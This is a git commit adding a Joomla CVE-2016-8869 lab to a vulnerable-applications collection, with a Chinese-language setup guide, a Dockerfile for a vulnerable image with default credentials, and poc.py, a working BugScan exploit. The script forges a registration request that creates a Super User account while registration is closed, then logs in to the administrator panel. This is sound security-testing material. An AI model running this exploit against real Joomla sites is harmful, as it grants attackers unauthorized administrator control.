添加 Joomla未授权创建特权用户漏洞(CVE-2016-8869)

README.md

@@ -79,6 +79,7 @@ docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-037
 ### [J](./j/)<div id="j"></div>
 
 * [Jenkins](./j/jenkins/)
+* [Joomla!](./j/joomla/)
 
 ### [O](./o/)<div id="o"></div>
 

j/README.md

@@ -1,3 +1,4 @@
 # J
 
 * [Jenkins](./jenkins/)
+* [Joomla!](./joomla/)

j/joomla/1/Dockerfile

@@ -0,0 +1,7 @@
+FROM medicean/vulapps:base_joomla_3.5
+
+RUN /etc/init.d/mysql restart \
+    && mysql -e "use joomla;update kmxhf_extensions set params=replace(params, 0x227573657261637469766174696f6e223a223222, 0x227573657261637469766174696f6e223a223022);update kmxhf_extensions set params=replace(params, 0x227573657261637469766174696f6e223a223122, 0x227573657261637469766174696f6e223a223022);" -uroot -proot
+
+EXPOSE 80
+CMD ["/start.sh"]

j/joomla/1/README.md

@@ -0,0 +1,65 @@
+Joomla未授权创建特权用户漏洞(CVE-2016-8869)
+---
+
+### 漏洞信息
+
+Joomla 3.4.4到3.6.3的版本中，攻击者可以在网站关闭注册的情况下注册用户。
+
+详细参考：[Joomla 3.4.4 - 3.6.3 未授权创建用户漏洞](https://www.seebug.org/vuldb/ssvid-92496)
+
+### 镜像信息
+
+类型 | 用户名 | 密码
+:-:|:-:|:-:
+Mysql | root | root
+/administrator/ | admin | admin123
+
+
+### 获取环境:
+
+1. 拉取镜像到本地
+
+ ```
+$ docker pull medicean/vulapps:j_joomla_1
+ ```
+
+2. 启动环境
+
+ ```
+$ docker run -d -p 8000:80 medicean/vulapps:j_joomla_1
+ ```
+ > `-p 8000:80` 前面的 8000 代表物理机的端口，可随意指定。 
+
+### 使用与利用
+
+访问 `http://你的 IP 地址:端口号/`
+
+### PoC 使用
+
+> 本例中使用 [Joomla未授权创建特权用户漏洞(CVE-2016-8869)检测 PoC](http://www.bugscan.net/source/plugin/4669/template/)
+
+
+1. 下载并安装 `BugScan SDK`
+
+ 详见 [BugScan 插件开发文档 - 环境配置](http://doc.bugscan.net/chapter1/1-1.html)
+
+2. 修改 `poc.py` 中地址为容器地址
+
+ ```
+if __name__ == '__main__':
+    from dummy import *
+    audit(assign(fingerprint.joomla, "http://localhost:8000")[1])
+
+ ```
+
+3. 运行 `poc.py`
+
+ ```
+$ python poc.py
+ ```
+
+### 相关链接
+
+* [Joomla 3.4.4 < 3.6.4 - Account Creation / Privilege Escalation](https://www.exploit-db.com/exploits/40637/)
+* [Joomla 3.4.4 - 3.6.3 未授权创建用户漏洞](https://www.seebug.org/vuldb/ssvid-92496)
+[Joomla 未授权创建特权用户漏洞(CVE-2016-8869)检测 PoC](http://www.bugscan.net/source/plugin/4669/template/)

j/joomla/1/poc.py

@@ -0,0 +1,83 @@
+#!/usr/bin/evn python
+# -*-:coding:utf-8 -*-
+
+import hashlib
+import uuid
+import re
+
+
+def assign(service, arg):
+    if service == fingerprint.joomla:
+        return True, arg
+
+
+def audit(arg):
+    url = arg + "index.php/component/users/?task=user.register"
+    code, head, res, redir_url, log1 = hackhttp.http(url)
+    p = re.compile(r'<input type="hidden" name="([0-9a-f]+)" value="1" />')
+    token = p.findall(res)[0]
+    password = hashlib.md5(str(uuid.uuid1())).hexdigest()
+    payload = """-----------------------------11366146071214659784807441306\r
+Content-Disposition: form-data; name="user[name]"\r
+\r
+{username}\r
+-----------------------------11366146071214659784807441306\r
+Content-Disposition: form-data; name="user[username]"\r
+\r
+{username}\r
+-----------------------------11366146071214659784807441306\r
+Content-Disposition: form-data; name="user[password1]"\r
+\r
+{password}\r
+-----------------------------11366146071214659784807441306\r
+Content-Disposition: form-data; name="user[password2]"\r
+\r
+{password}\r
+-----------------------------11366146071214659784807441306\r
+Content-Disposition: form-data; name="user[email1]"\r
+\r
+{email}\r
+-----------------------------11366146071214659784807441306\r
+Content-Disposition: form-data; name="user[email2]"\r
+\r
+{email}\r
+-----------------------------11366146071214659784807441306\r
+Content-Disposition: form-data; name="option"\r
+\r
+com_users\r
+-----------------------------11366146071214659784807441306\r
+Content-Disposition: form-data; name="user[groups][]"\r
+\r
+7\r
+-----------------------------11366146071214659784807441306\r
+Content-Disposition: form-data; name="task"\r
+\r
+user.register\r
+-----------------------------11366146071214659784807441306\r
+Content-Disposition: form-data; name="{token}"\r
+\r
+1\r
+-----------------------------11366146071214659784807441306--\r
+""".format(
+        username=password, token=token, password=password,
+        email="%s@vulcheck.com" % (password))
+    head = {
+        'Referer': arg + 'index.php/component/users/?view=registration',
+        'Content-Type': 'multipart/form-data; boundary=---------------------------11366146071214659784807441306'
+    }
+    code, head, res, redir_url, log2 = hackhttp.http(
+        url, data=payload, headers=head)
+
+    login_url = arg + '/administrator/index.php'
+    code, head, res, redir_url, log3 = hackhttp.http(login_url)
+    token = p.findall(res)[0]
+    login_data = "username={username}&passwd={password}&option=com_login&task=login&return=aW5kZXgucGhw&{token}=1".format(
+        username=password, token=token, password=password)
+    code, head, res, redir_url, log4 = hackhttp.http(login_url, data=login_data)
+    code, head, res, redir_url, log5 = hackhttp.http(login_url)
+    if 'System <span class="caret">' in res:
+        security_hole(arg, log=log2)
+
+if __name__ == '__main__':
+    from dummy import *
+    audit(assign(fingerprint.joomla, "http://127.0.0.1:32773/")[1])

j/joomla/README.md

@@ -0,0 +1,3 @@
+# Joomla! VulApps
+
+* [Joomla未授权创建特权用户漏洞(CVE-2016-8869)](./1/)